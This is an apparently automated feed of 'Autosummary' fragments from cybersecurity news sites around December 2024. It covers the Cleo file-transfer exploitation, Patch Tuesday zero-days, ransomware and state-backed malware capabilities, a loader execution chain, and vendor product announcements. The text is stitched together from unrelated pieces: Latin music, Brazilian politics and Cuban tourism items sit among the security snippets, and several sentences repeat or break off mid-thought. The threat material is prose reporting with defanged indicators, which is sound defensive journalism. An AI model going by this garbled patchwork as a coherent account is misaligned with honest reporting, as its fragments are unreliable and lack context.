The post-exploitation framework: Deletes the first stage payload (downloader) Sends out status updates to the C2 server Allows operators to read and collect files or directories Allows operators to retrieve Cleo configuration files (for information about the installation) and issue execution commands Allows operators to perform basic read and write operations on the filesystem Rapid7 researchers have visually explained the attack flow thus: Attack flow (Source: Rapid7) After initial exploitation, they’ve also observed the attacker: Executing commands aimed at gathering user, group and system information from the impacted system and displaying domain trust relationships Executing an overpass-the-hash attack to create a valid Kerberos ticket and thus gain access to additional network resources within the impacted environment. "Autosummary:
"Autosummary:
While she is widely reported to be both hardworking and ambitious, Rocío Guerrero, head of Latin music at Amazon Music, says that the singer – and Latin music in general - have been greatly helped by the rise of streaming, both the music and the accompanying videos."And reggaeton is super danceable, it"s super consumable, it"s super youth oriented," adds Ms Cobo, who is the author of a book on Latin music.Meanwhile, in the US, Latin music is now the fastest-growing genre, hitting a record $1.4bn (£1.1bn) in venues last year, according to the Recording Industry Association of America (RIAA). "Autosummary:
It intercepts user-level system calls and alters the behavior of looks like ls, ps, netstat, top, htop, and cat to hide files, processes, and network connections associated with the rootkit It can also dynamically hide any other files and directories based on attacker-defined criteria and make malicious binaries entirely invisible to users and system admins. "Autosummary:
The malware"s modular nature makes it capable of compromising a broad spectrum of devices from various manufacturers, including D-Link, Hikvision, Baicells, Red Lion, Orpak, Phoenix Contact, Teltonika, and Unitronics. Gasboy fuel control system from where the malware was extracted Source: Claroty Malware capabilities The malware, which is stored in the "/usr/bin/" directory under the name "iocontrol." uses a modular configuration to adapt to different vendors and device types, targeting a broad spectrum of system architectures. "Autosummary:
Potentially compromised customer personal information includes name, birthdate, address, phone number, email address, government-issued ID, social security number, transaction activity, and photographs of users. "Sonatype’s 2024 Open Source Malware Threat Report reveals that the number of malicious packages has surpassed 778,500 since tracking began in 2019. In 2024, researchers examined how threat actors leverage malicious open-source packages to target developers, particularly as enterprises increasingly adopt open-source tools to build custom AI models. Source: Sonatype Open source malware thrives in ecosystems with low entry barriers, no author verification, high usage, and diverse users. Platforms like npm and PyPI, which handle … More
The post Open source malware up 200% since 2023 appeared first on Help Net Security.
"Autosummary:
"With the introduction of Cato IoT/OT Security, Cato Networks is enabling enterprises to simplify the management and security of Internet of Things (IoT) and operational technology (OT) devices. Cato IoT/OT Security converges device discovery and classification, policy enforcement, and threat prevention in a SASE platform. Cato IoT/OT Security is a native feature in the Cato SASE Cloud Platform, which allows enterprises to instantly activate the new solution with a click of a button. There is … More
The post Cato Networks extends SASE-based protection to IoT/OT environments appeared first on Help Net Security.
"Autosummary:
Additionally, IoT devices are often less secure by design, while OT systems in critical infrastructure are generally challenging to patch,” said John Grady, principal analyst, network security and web application security at ESG. Enterprises require an IoT/OT security solution that provides discovery, visibility, policy enforcement, and threat prevention for IoT/OT devices. "CyTwist launches its patented detection engine to combat the insidious rise of AI-generated malware. Enhancing an organization’s existing security stack, CyTwist’s solution profiles threat actors using field-proven counterintelligence methodologies and hyper-targeted probability algorithms, resulting in detection of a suspected attack within minutes. Validated by a red team live attack simulation with a prominent telecoms provider, mirrored on the September 2024 attack against French government agencies and private companies, CyTwist’s platform’s results are unambiguous – successfully … More
The post CyTwist’s detection engine combats AI-generated malware appeared first on Help Net Security.
"Autosummary:
During the simulated attack, just like the French encounter, it was based on, AI-engineered malware employed advanced techniques and encryption to elude signature-based and rule-driven tools. "Autosummary:
Also of note are two other remote code execution flaws impacting Windows Hyper-V (CVE-2024-49117, CVSS score: 8.8), Remote Desktop Client (CVE-2024-49105, CVSS score: 8.4), and Microsoft Muzic (CVE-2024-49063, CVSS score: 8.4). "Though in-the-wild exploitation details aren"t known yet, looking back at the history of CLFS driver vulnerabilities, it is interesting to note that ransomware operators have developed a penchant for exploiting CLFS elevation of privilege flaws over the last few years," Satnam Narang, senior staff research engineer at Tenable, told The Hacker News. "Autosummary:
It happened a second time in March 2022 when the company received yet another report from an anonymous China-based researcher detailing two separate flaws: CVE-2022-1040 (CVSS score: 9.8), a critical authentication bypass flaw in Sophos firewalls that allows a remote attacker to execute arbitrary code, and CVE-2022-1292 (CVSS score: 9.8), a command injection bug in OpenSSL The in-the-wild exploitation of CVE-2022-1040 has been assigned the moniker Personal Panda. "Autosummary:
The Hacker News also identified multiple patent applications filed by Wuhan ZRTZ Information Technology Co, Ltd. that delve into the various methods which can be used to "collect and analyze client data such as data of certain types like call record of the suspect"s mobile phone, short messages, an address book, instant chat software (QQ, WeChat, Momo, etc.) and so forth, and generate a relationship diagram between the suspect and others. "Autosummary:
The attacks, which leveraged tools previously identified as linked to China-based advanced persistent threat (APT) groups, are characterized by the use of both open-source and living-off-the-land (LotL) techniques. "Autosummary:
INC vs Lynx ransomware string comparison (BleepingComputer) Since it emerged as a ransomware-as-a-service (RaaS) operation in July 2023, INC Ransom has also breached many education, healthcare, government, and industrial entities, including Yamaha Motor Philippines, Scotland"s National Health Service (NHS), and the U.S. division of Xerox Business Solutions (XBS). "Autosummary:
"On November 29, 2024, Krispy Kreme, Inc. was notified regarding unauthorized activity on a portion of its information technology systems," reads the filing. "Autosummary:
Secret Blizzard has a track record of targeting various sectors to facilitate long-term covert access for intelligence collection, but their primary focus is on ministries of foreign affairs, embassies, government offices, defense departments, and defense-related companies across the world. "Autosummary:
Akamai"s research found that this approach could also open up an avenue for abuse, allowing malicious actors to read/write messages, steal data entered in websites (e.g., payment information), and execute commands that redirect victims to malicious websites when a currently displayed web page in a browser refreshes or changes. The attack "allows the writing of custom DLLs to a target machine, loading them to a service, and executing their functionality with arbitrary parameters," security researcher Eliran Nissan said. "Autosummary:
"Autosummary:
One of the tools Tavdig loads on compromised devices is KazuarV2, Turla"s more advanced, stealthy backdoor, designed for long-term intelligence collection, command execution, and data exfiltration. "Autosummary:
By installing outdated plugins with known vulnerabilities with available exploits, the attackers can access a large pool of flaws that lead to remote code execution (RCE), SQL injection, cross-site scripting (XSS) flaws, or create backdoor admin accounts. "Autosummary:
In early October, the software company warned of three new security vulnerabilities (CVE-2024-9379, CVE-2024-9380, and CVE-2024-9381) in its Cloud Service Appliance (CSA) that are actively exploited in attacks in the wild. "Autosummary:
Previously, Resecurity described multiple episodes of Smishing Triad activity targeting online banking, e-commerce and payment systems customers in other geographies including USA, EU, UK, Pakistan, India, UAE and KSA. According to a recent Strategic Analysis Report released by the UAE Financial Intelligence Unit (UAEFIU), fraud, particularly in the UAE, remains a major risk, contributing to money laundering activities, with an estimated financial loss of AED 1.2 billion (equal to USD 326 million) between 2021 and 2023. "Autosummary:
"In this Help Net Security interview, Phani Dasari, CISO at HGS, discusses key aspects of cybersecurity assessments, including effective tools and methodologies, the role of AI and automation, and strategies for aligning assessments with organizational needs.
The post Strengthening security posture with comprehensive cybersecurity assessments appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Phani Dasari, CISO at HGS, discusses key aspects of cybersecurity assessments, including effective tools and methodologies, the role of AI and automation, and strategies for aligning assessments with organizational needs.Framework-based assessments, such as those using NIST CSF, ISO 27001, or HIPAA, offer structured methodologies for comprehensive risk management and compliance. "Cloud Security Engineer Sendbird | USA | Hybrid – View job details As a Cloud Security Engineer, you will work with engineering teams to build secure infrastructure at scale, secure multi-account and multi-cloud infrastructure for Sendbird, own CSPM and cloud security tooling while building automations, embed security tools into the CI/CD system for IaC scanning, identify security gaps and develop solutions, and research and identify new attacks targeting Sendbird’s products. Cyber Network Analyst Cynerio | … More
The post Cybersecurity jobs available right now: December 10, 2024 appeared first on Help Net Security.
"Autosummary:
Perform tests and assessments in the cloud, including but not limited to AWS, Azure, GCP, etc. Specialist, Network Security M42 Health | UAE | On-site – View job details As a Specialist, Network Security, you will design, implement, and maintain enterprise network-security infrastructure and multi-cloud platforms, including firewalls, wireless systems, and load balancers. DevOps Security Engineer with DLP Sensation Business Consulting | Canada | On-site – View job details As a DevOps Security Engineer with DLP, you will automate on-prem infrastructure processes to implement and enhance DLP controls, improve DevOps practices within the squad by leveraging Infrastructure as Code, test automation, and CI/CD, and manage a global DLP security infrastructure while working with various security products such as Symantec DLP, Splunk, Microsoft Information Protection, and Netskope. Network Security Specialist TYH Investment | India | Hybrid – View job details As a Network Security Specialist, you will configure, manage, and maintain various firewalls and security solutions, including but not limited to F5, Cisco, Palo Alto, Check Point, and other platforms. "SecureAuth is releasing biometric continuous identity assurance (BCIA). This ability is designed to safeguard a company’s sensitive information for the duration of a user’s session — providing additional protection from emerging threats in today’s hybrid and remote work environments. “Not having biometric continuous identity assurance after the initial login authentication creates a critical vulnerability,” said SecureAuth CEO Joseph Dhanapal. “The rest of the session remains unprotected, leaving organizations exposed to unauthorized access and malicious actions. … More
The post SecureAuth protects sensitive information with biometric continuous identity assurance appeared first on Help Net Security.
"Autosummary:
According to SecureAuth CRO Tom Smith, these expanded capabilities strengthen SecureAuth’s competitiveness in sectors with high security needs, especially legal services, call centers and regulated industries like financial services, healthcare, defense contracting, and more. "Attackers are exploiting a vulnerability (CVE-2024-50623) in file transfer software by Cleo – LexiCo, VLTransfer, and Harmony – to gain access to organizations’ systems, Huntress researchers warned on Monday. “We’ve discovered at least 10 businesses whose Cleo servers were compromised with a notable uptick in exploitation observed on December 8 around 07:00 UTC. After some initial analysis, however, we have found evidence of exploitation as early as December 3,” they shared, and noted that there … More
The post Attackers actively exploiting flaw(s) in Cleo file transfer software (CVE-2024-50623) appeared first on Help Net Security.
"Autosummary:
For those that use Autorun in day-to-day operations, the company advises: Changing the default Autorun directory to a custom name Searching for malicious files on the hosts and removing them (either manually or via provided scripts that locate and quarantine any malicious hosts) Blocking attack IP addresses at the network/firewall level The company also laid out configuration changes that can be made by customers to restrict access to the servers, and advised using EDR solutions to monitor for unauthorized changes in configuration or other critical files. "Autosummary:
"Autosummary:
In one of the latest attacks, criminals utilize scripts to facilitate the execution chain that involves the following steps: LNK file initiates Forfiles Forfiles locates HelpPane PowerShell launches Mshta with the AES-encrypted first-stage payload Mshta decrypts and executes the downloaded payload PowerShell runs an AES-encrypted command to decrypt Emmenhtal Entire execution chain demonstrated by ANY.RUN"s Interactive sandbox The Emmenhtal loader, which is the final PowerShell script, executes a payload — often Updater.exe — by using a binary file with a generated name as an argument. Identify threats in < 40 seconds Save resources on setup and maintenance Log and examine all malicious activities Work in private mode with your team Get a 14-day free trial of ANY.RUN to test all the features it offers → "Autosummary:
"Autosummary:
"Between April 22 and 25, 2020, Guan Tianfeng used this zero-day exploit to deploy malware to approximately 81,000 firewalls owned by thousands of businesses worldwide," a press release published today revealed. "Autosummary:
Cleo says its software is used by 4,000 companies worldwide, including Target, Walmart, Lowes, CVS, The Home Depot, FedEx, Kroger, Wayfair, Dollar General, Victrola, and Duraflame. "Autosummary:
Initially, our only indicators of compromise were the recipient’s email address and the source IP of the deletion rule creation event, which turned out to be a general Microsoft IP and, therefore, not very useful in that case. Fortunately, our customer’s security team acted swiftly, disabling the account, ending the session, and resetting the user’s credentials within 30 minutes. To develop part of the attack, the threat actor used the public platform Render, a unified cloud platform that allows developers to build, deploy, and scale applications and websites easily. IoCs 138.199.52[.]3 siffinance[.]com login.siffinance[.]com www.siffinance[.]com ywnjb.siffinance[.]com atoantibot.onrender[.]com file365-cloud.s3.eu-west-2.amazonaws[.]com How Varonis can help Varonis monitors real-time email and browsing activities and user and data activities, providing a comprehensive tool for cyber forensics investigations. Circling back to the “hacker humor” mentioned above, the attacker has disabled (or deactivated) the malicious domain, but if you try to access it today, it redirects to a popular internet prank known as Rickrolling. "Autosummary:
Also tracked as Earth Estries, Ghost Emperor, FamousSparrow, and UNC2286, the Salt Typhoon Chinese state-sponsored hacking group has been active since at least 2019, breaching government entities and telecom companies across Southeast Asia. "Autosummary:
WPForms is an easy-to-use drag-and-drop WordPress form builder for creating contact, feedback, subscription, and payment forms, offering support for Stripe, PayPal, Square, and others. "Autosummary:
"Autosummary:
Windows users can install this update by going into Settings, clicking on Windows Update, and manually performing a "Check for Updates." However, as this update is mandatory, it will automatically start installing in Windows once you check for updates. "Autosummary:
"Autosummary:
Not "backup" as in a "backup of your data" unfortunately but rather as a "backup plan". 3AM drops a ransom note on attacked systems, warning victims that their sensitive data has been stolen and proposing "a deal" to prevent it from being sold on the dark web.The latter of those not only saw social security numbers, driver’s licenses, payroll, health and other personal data of Hoboken workers and residents leaked, but also erotic short stories found on an employee"s computer. "On December 2024 Patch Tuesday, Microsoft resolved 71 vulnerabilities in a variety of its products, including a zero-day (CVE-2024-49138) that’s been exploited by attackers in the wild to execute code with higher privileges. CVE-2024-49138 exploited by attackers CVE-2024-49138 stems from a heap-based buffer overflow vulnerability in the Windows Common Log File System (CLFS) Driver and can be exploited by attackers to elevate their privileges on the target host to SYSTEM, according to Microsoft. The attack … More
The post Microsoft fixes exploited zero-day (CVE-2024-49138) appeared first on Help Net Security.
"Autosummary:
“Though in-the-wild exploitation details aren’t known yet, looking back at the history of CLFS driver vulnerabilities, it is interesting to note that ransomware operators have developed a penchant for exploiting CLFS elevation of privilege flaws over the last few years,” Satnam Narang, senior staff research engineer at Tenable, told Help Net Security. "The Department of the Treasury is sanctioning Chinese cybersecurity company Sichuan Silence, and one of its employees, Guan Tianfeng, for their roles in the April 2020 compromise of tens of thousands of firewalls worldwide. Many of the victims were U.S. critical infrastructure companies. The Department of Justice unsealed an indictment on Guan for the same activity. The U.S. Department of State also announced a Rewards for Justice reward offer of up to $10 million for … More
The post US sanctions Chinese cybersecurity company for firewall compromise, ransomware attacks appeared first on Help Net Security.
"Autosummary:
OFAC is designating Sichuan Silence and Guan pursuant to Executive Order (E.O.) 13694, as amended by E.O. 13757, for being responsible for or complicit in, or having engaged in, directly or indirectly cyber-enabled activities originating from, or directed by persons located, in whole or in substantial part, outside the United States that are reasonably likely to result in, or have materially contributed to, a significant threat to the national security, foreign policy, or economic health or financial stability of the United States and that have the purpose or effect of harming, or otherwise significantly compromising the provision of services by, a computer or network of computers that support one or more entities in a critical infrastructure sector. "Autosummary:
"Since we saw that Blue Yonder had an instance of Cleo"s software open to the internet via Shodan, and Termite has claimed Blue Yonder amongst its victims, which was also confirmed by their listing and open directory of files, I"d say that Gossi is correct in his statement," Jamie Levy, Huntress" Director of Adversary Tactics, told the publication. The Illinois-based company, which has over 4,200 customers across the world, has since issued another advisory (CVE pending), warning of a separate "unauthenticated malicious hosts vulnerability that could lead to remote code execution. "Autosummary:
" The newest version of Antidot is packed in support for new commands that allow the operators to launch "Keyboard & Input" settings, interact with the lock screen based on the set value (i.e., PIN, pattern, or password), wake up the device, reduce screen brightness to the lowest level, launch overlays to steal Google account credentials, and even prevent it from being uninstalled. "Autosummary:
Microsoft December 2024 Patch Tuesday addressed actively exploited zero-day Pierluigi Paganini December 10, 2024 December 10, 2024 Microsoft December 2024 Patch Tuesday security updates addressed 71 vulnerabilities including an actively exploited zero-day. "Autosummary:
The teams of specialists are working closely with the national cybersecurity authorities to manage and resolve the incident, aiming to address the situation as quickly as possible, identify the source of the attack, and limit its impact.” reads the note. Pierluigi Paganini December 10, 2024 December 10, 2024 Romanian energy supplier Electrica Group is investigating an ongoing ransomware attack impacting its operations. "Autosummary:
While Lula is in hospital, Vice-President Geraldo Alckmin will take on some of the president"s commitments, including welcoming Slovak Prime Minister Robert Fico, who is due to arrive in Brazil later today. "Autosummary:
Hit by blackouts Cuba’s tourism industry now braces for Trump Getty Images Canadian tourists, such as these taking part in an exercise class, are vital to the Cuban tourism sector With winter nights drawing in across North America, Canadian “snowbirds” – citizens who flee their freezing temperatures for sunnier climes every year – are planning their annual trips to Florida or the Caribbean.“The Ministry of Tourism has been preparing for the winter season to deliver better services, uninterrupted supplies, a better airport experience, and more and new car rentals.” "The holiday season is approaching, and with it, the tradition of gift-giving. For professionals and enthusiasts alike, a well-chosen book can provide both knowledge and inspiration. To help with ideas on what to give, we’ve compiled a list of cybersecurity books to consider. Security Yearbook 2024: A History and Directory of the IT Security Industry Author: Richard Stiennon In the book, you’ll find a comprehensive directory of cybersecurity vendors, updated for 2024, complete with headquarters … More
The post Top cybersecurity books for your holiday gift list appeared first on Help Net Security.
"Autosummary:
Author: Richard Stiennon In the book, you’ll find a comprehensive directory of cybersecurity vendors, updated for 2024, complete with headquarters location, category, sub-category, number of employees, and growth trends. "In this Help Net Security video, Richard Hummel, NETSCOUT’s Director of Threat Intelligence, talks about his journey into cybersecurity and offers insight for those that are interested in pursuing it as a career.
The post What makes for a fulfilled cybersecurity career appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Exposed information varies per individual, however, it may include demographic information, medical information, health insurance information, Social Security number, driver’s license number, financial information, and other personal or health information that patients provided Anna Jacques. "Autosummary:
"RSA announced expanded phishing-resistant, passwordless capabilities. Built to secure financial services organizations, government agencies, healthcare, and other highly-regulated industries from the most frequent and highest-impact attacks, these new RSA capabilities meet the most stringent cybersecurity regulations and are a key asset in developing a Zero Trust security architecture: The FIDO2 Certified RSA Authenticator App 4.5 for iOS and Android: RSA now makes it easy to deploy FIDO2-Certified device-bound passkeys on users’ mobile devices through RSA … More
The post RSA expands phishing-resistant, passwordless capabilities appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The list includes — CVE-2024-41713 (Mitel MiCollab), CVE-2024-51378 (CyberPanel), CVE-2023-45727 (Proself), CVE-2024-11680 (ProjectSend), CVE-2024-11667 (Zyxel), CVE-2024-42448 (Veeam), CVE-2024-10905 (SailPoint IdentityIQ), CVE-2024-5921 (Palo Alto Networks GlobalProtect), CVE-2024-29014 (SonicWall), CVE-2014-2120 (Cisco Adaptive Security Appliance), CVE-2024-20397 (Cisco NX-OS), CVE-2024-52338 (Apache Arrow), CVE-2024-52316 (Apache Tomcat), CVE-2024-49803, CVE-2024-49805 (IBM Security Verify Access Appliance), CVE-2024-12053 (Google Chrome), CVE-2024-38193 (Microsoft Windows), and CVE-2024-12209 (WP Umbrella: Update Backup Restore & Monitoring plugin).Salt Typhoon Guidance Issued — Australia, Canada, New Zealand, and the U.S. issued a joint guidance for organizations to safeguard their networks against threats posed by Salt Typhoon, which has been recently linked to a spate of cyber attacks directed against telecommunication companies in the U.S., including AT&T, T-Mobile, and Verizon. Australia, Canada, New Zealand, and the U.S. issued a joint guidance for organizations to safeguard their networks against threats posed by Salt Typhoon, which has been recently linked to a spate of cyber attacks directed against telecommunication companies in the U.S., including AT&T, T-Mobile, and Verizon.A majority of the campaigns distributing the malware have targeted users in Austria, Belgium, France, Italy, Portugal, Spain, Turkey, and the United Kingdom.A majority of the campaigns distributing the malware have targeted users in Austria, Belgium, France, Italy, Portugal, Spain, Turkey, and the United Kingdom."Criminals use AI-generated text to appear believable to a reader in furtherance of social engineering, spear-phishing, and financial fraud schemes such as romance, investment, and other confidence schemes or to overcome common indicators of fraud schemes," the FBI said."Criminals use AI-generated text to appear believable to a reader in furtherance of social engineering, spear-phishing, and financial fraud schemes such as romance, investment, and other confidence schemes or to overcome common indicators of fraud schemes," the FBI said."Once Ogletree had access to the victim companies" networks, Ogletree accessed and stole confidential data, including data that was later posted for sale on the dark web, and, at times, used the companies" services to facilitate the theft of cryptocurrency from unwitting victims. "Autosummary:
The threat actor, which is also referred to as UNC4393, has since put to use various bespoke malware families to carry out its objectives - KNOTWRAP, a memory-only dropper written in C/C++ that can execute an additional payload in memory KNOTROCK, a .NET-based utility that"s used to execute the ransomware DAWNCRY, a memory-only dropper that decrypts an embedded resource into memory with a hard-coded key PORTYARD, a tunneler that establishes a connection to a hard-coded command-and-control (C2) server using a custom binary protocol over TCP COGSCAN, a .NET reconnaissance assembly used to gather a list of hosts available on the network "Black Basta"s evolution in malware dissemination shows a peculiar shift from a purely botnet-reliant approach to a hybrid model that integrates social engineering," RedSense"s Yelisey Bohuslavskiy said. "Autosummary:
"Autosummary:
Deloitte denied its systems were hacked by Brain Cipher ransomware group Pierluigi Paganini December 09, 2024 December 09, 2024 Deloitte has responded to claims by the Brain Cipher ransomware group, which alleges the theft of over 1 terabyte of the company’s data. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Veeam plugs serious holes in Service Provider Console (CVE-2024-42448, CVE-2024-42449) Veeam has fixed two vulnerabilities in Veeam Service Provider Console (VSPC), one of which (CVE-2024-42448) may allow remote attackers to achieve code exection on the VSPC server machine. December 2024 Patch Tuesday forecast: The secure future initiative impact It seems like 2024 just started, but the final Patch Tuesday of … More
The post Week in review: Veeam Service Provider Console flaws fixed, Patch Tuesday forecast appeared first on Help Net Security.
"Autosummary:
Building trust in tokenized economies In this Help Net Security video, Jeremy Bradley, COO of Zama, explores the emerging privacy-preserving technologies that can help solve this challenge, focusing on Fully Homomorphic Encryption (FHE), which enables data to remain encrypted even during processing, positioning it as a potential cornerstone for secure, decentralized environments. Securing AI’s new frontier: Visibility, governance, and mitigating compliance risks In this Help Net Security interview, Niv Braun, CEO at Noma Security, discusses the difficulties security teams face due to the fragmented nature of AI processes, tools, and teams across the data and AI lifecycle. New infosec products of the week: December 6, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Datadog, Fortinet, Radiant Logic, Sweet Security, Tenable, and Veza. "Autosummary:
"Autosummary:
RedLine info-stealer campaign targets Russian businesses through pirated corporate software Pierluigi Paganini December 08, 2024 December 08, 2024 An ongoing RedLine information-stealing campaign is targeting Russian businesses using pirated corporate software. "Autosummary:
" The European Commission, in a press statement on Thursday, said it has stepped up its monitoring of TikTok, urging the platform to "freeze and preserve data related to actual or foreseeable systemic risks its service could pose on electoral processes and civic discourse in the E.U." To that end, it has been asked to retain internal documents and information regarding the design and functioning of its recommender systems, in addition to details on how it"s addressing the risk of intentional manipulation through a technique called coordinated inauthentic behavior (CIB). "Autosummary:
Moreover, the spyware retains some permissions also found in the genuine app, such as precise location tracking, recording phone calls, and accessing contact information, which are common functionalities in many spyware tools.Its functionality includes location tracking, screen capture, keylogging, call recording, file extraction, password retrieval, and reading messages from other apps. "Autosummary:
"Autosummary:
"Autosummary:
"GenAI is a powerful tool that can be used by security teams to protect organizations, however, it can also be used by malicious actors, making phishing-related attacks a growing and concerning threat vector, according to Ivanti. Ivanti’s research revealed that when asked which threats are increasing in severity due to GenAI, phishing was the top response (45%) among survey participants. Although training is a crucial part of a multi-layered cyber defense, many organizations have not … More
The post GenAI makes phishing attacks more believable and cost-effective appeared first on Help Net Security.
"Autosummary:
GenAI is a powerful tool that can be used by security teams to protect organizations, however, it can also be used by malicious actors, making phishing-related attacks a growing and concerning threat vector, according to Ivanti. "Autosummary:
PteroPSLoad, PteroX, PteroSand, PteroDash, PteroRisk, and PteroPowder - Download payloads PteroCDrop - Drop Visual Basic Script payloads PteroClone - Deliver payloads using the rclone utility PteroLNK - Weaponize connected USB drives PteroDig - Weaponize LNK files in the Desktop folder for persistence PteroSocks - Provide partial SOCKS proxy functionalit PteroPShell, ReVBShell - Function as a remote shell PteroPSDoor, PteroVDoor - Exfiltrate specific files from the file system PteroScreen - Capture and exfiltrate screenshots PteroSteal - Exfiltrate credentials stored by web browsers PteroCookie - Exfiltrate cookies stored by web browsers PteroSig - Exfiltrate data stored by the Signal application PteroGram - Exfiltrate data stored by the Telegram application PteroBleed - Exfiltrate data stored by web versions of Telegram and WhatsApp from Google Chrome, Microsoft Edge, and Opera PteroScout - Exfiltrate system information The latest set of attacks highlighted by Recorded Future entails sending phishing emails bearing HTML attachments, which leverage a technique called HTML smuggling to activate the infection process via embedded JavaScript code. "Downloading anything from the internet is a gamble these days: you might think that you are downloading an innocuous app from a legitimate firm but thanks to clever misuse of AI and some social engineering, you can end up with information and cryptocurrency-stealing malware. Case in point: Cado Security Labs researchers have recently reported websites set up to impersonate companies offering a video conferencing app, but serving/pushing the Realst info-stealer. Preparing and executing the scam … More
The post Windows, macOS users targeted with crypto-and-info-stealing malware appeared first on Help Net Security.
"Autosummary:
The malware looks to steal Telegram credentials; keychain credentials; browser cookies and credentials stored in Chrome, Opera, Brave, Edge, Arc, CocCoc and Vivaldi browsers; Ledger, Trezor, Phantom and Binance wallets; and banking card details. "Autosummary:
Its list of over 3,000 customers includes other high-profile companies like Microsoft, Renault, Bayer, Tesco, Lenovo, DHL, 3M, Ace Hardware, Procter & Gamble, Carlsberg, Dole, Wallgreens, Western Digital, and 7-Eleven. "Autosummary:
0patch says that other NTLM hash disclosure flaws disclosed in the past, like PetitPotam, PrinterBug/SpoolSample, and DFSCoerce, all remain without an official fix at the latest Windows versions, leaving users with only the 0patch-provided micropatches. "Autosummary:
System info collected by the malware Source: Cado The Rust-based executable attempts to collect the following information, add it to a ZIP file, and exfiltrate it: Telegram credentials Banking card details Browser cookies, history, and autofill credentials from Google Chrome, Opera, Brave, Microsoft Edge, Arc, CocCoc, and Vivaldi Ledger, Trezor, Phantom, and Binance wallets Compared to macOS, the Windows version features a more elaborate and versatile payload delivery mechanism, better evasion, and the ability to persist between reboots through registry modification. "Autosummary:
" The second stage incorporates features to log keystrokes, extract files and stored passwords, read chats from other messaging apps, inject JavaScript, execute shell commands, obtain the device unlock password, and even add a new device administrator. "Autosummary:
" Comment by Glenn Jocher on GitHub Source: BleepingComputer The developers are currently investigating the root cause, and potential vulnerabilities in the Ultralytics build environment to determine how it was breached. "Autosummary:
Additionally, if users filled out forms, data such as name, email, phone number, address, and gender may have been shared with third-party vendors. "Autosummary:
“getresetstatus in dns/views.py and ftp/views.py in CyberPanel (aka Cyber Panel) before 1c0c6cb allows remote attackers to bypass authentication and execute arbitrary commands via /dns/getresetstatus or /ftp/getresetstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX.” reads the advisory. "Autosummary:
The TGR Group is said to provide a wide range of illegal financial services, including laundering funds belonging to sanctioned entities, an unregistered service to exchange cash and cryptocurrency, accepting cash receipts and converting them into digital assets for clients, a prepaid credit card service, and concealing the source of funds to allow Russian elites to purchase property in the U.K. The NCA noted that the Smart network was used to fund Russian espionage operations between late 2022 to summer 2023. "Autosummary:
An incorrect permission assignment for critical resource vulnerability that allows an attacker with guest account access to read sensitive files, including those containing credentials CVE-2024-47133 (CVSS score: 7.2) - An operating system (OS) command injection vulnerability that allows a logged-in user with an administrative account to execute arbitrary commands (CVSS score: 7.2) - An operating system (OS) command injection vulnerability that allows a logged-in user with an administrative account to execute arbitrary commands CVE-2024-52564 (CVSS score: 7.5) - "Netography announced new ransomware detection capabilities that enable organizations to respond to malicious activity in real-time before it disrupts operations or threatens business continuity. These AI-powered enhancements enable Fusion customers to close the network observability and security gaps caused by limitations in their existing platform-native and cloud-native tools, including the inability to detect malicious activity and the lack of a holistic view of all network activity. The scope of the ransomware problem continues to grow, … More
The post Netography introduces AI-powered ransomware detection capabilities appeared first on Help Net Security.
"Autosummary:
The Fusion platform also reduces the workload of operations teams by automatically discovering new VPCs or VNet instances (or changes in the behavior in existing instances), applying policies, and monitoring the activity of those instances: Virtual Private Cloud (VPC) and Virtual Network (VNet) Auto-Detection and Auto-Onboarding – Fusion can now automatically detect, apply policies, and monitor newly discovered VPC and VNets, eliminating blind spots in security monitoring. "FBI and Cybersecurity and Infrastructure Security Agency (CISA) officials have advised Americans to use encrypted call and messaging apps to protect their communications from threat actors that have – and will – burrow into the networks and systems of US telecommunication companies. NBC News reported that the advice was given during a conference call with the media on Tuesday, during which the official also shared that the compromise of the networks of multiple US telcos … More
The post 8 US telcos compromised, FBI advises Americans to use encrypted communications appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" Countries affected by Earth Minotaur"s attacks span Australia, Belgium, Canada, France, Germany, India, Italy, Japan, Nepal, the Netherlands, Norway, Russia, Spain, Switzerland, Taiwan, Turkey, and the U.S. MOONSHINE first came to light in September 2019 as part of cyber attacks targeting the Tibetan community, with the Citizen Lab attributing its use to an operator it tracks under the moniker POISON CARP, which overlaps with threat groups Earth Empusa and Evil Eye. "Autosummary:
The era of "just" on-prem systems and networks is long gone – today"s attack surface encompasses SaaS platforms, IoT devices, hybrid and remote workforces, complex supply chains, social media, third-party platforms, the dark web, public-facing assets and much, much more.In a recent report, How to Grow Vulnerability Management into Exposure Management (Gartner, How to Grow Vulnerability Management Into Exposure Management, 8 November 2024, Mitchell Schneider Et Al.), we believe Gartner® addresses this point precisely and demonstrates how organizations can – and must – shift from a vulnerability-centric strategy to a broader Exposure Management (EM) framework. Metrics that reflect business-driven insights (such as a reduction of attack surface exposure, a decrease in risk to critical assets, and any operational efficiencies gained), bridge the gap between technical cybersecurity measures and business goals. With Exposure Management, organizations can better address what truly matters: safeguarding our critical assets, minimizing operational disruptions, and aligning our cybersecurity efforts with business priorities. "Autosummary:
Besides using DLL side-loading to execute malicious payloads, the attack entails the use of open-source tools like FileZilla, Impacket, and PSCP, while also employing living-off-the-land (LotL) programs like Windows Management Instrumentation (WMI), PsExec, and PowerShell. "Autosummary:
"Autosummary:
Recent samples use a simplified string decryption routine, shifting from a complex pseudo-random number generator (PRNG) to a more efficient XOR-based routine. Persistence mechanisms: After infection, Latrodectus replicates itself to a hidden system location, commonly *%AppData%*, and ensures persistence by creating scheduled tasks like C:\Windows\System32\Tasks\system_update to launch after reboots. After infection, Latrodectus replicates itself to a hidden system location, commonly *%AppData%*, and ensures persistence by creating scheduled tasks like C:\Windows\System32\Tasks\system_update to launch after reboots. Environment evasion: Before loading its payload, Latrodectus checks for virtualization environments by examining several system attributes.With its real-time monitoring, threat detection, and log analysis capabilities, Wazuh can identify suspicious activities that indicate the presence of Latrodectus malware, such as unusual file modifications, encrypted data, or unauthorized access attempts.In this article, we will explore the nature of Latrodectus malware, how it operates, and, most importantly, how organizations can defend against it.These capabilities include selective data theft, where the malware targets specific data types to exfiltrate, alongside system reconnaissance and, occasionally, ransomware functions. "Autosummary:
Mitel MiCollab is an enterprise collaboration platform that consolidates various communication tools into a single application, offering voice and video calling, messaging, presence information, audio conferencing, mobility support, and team collaboration functionalities. "Autosummary:
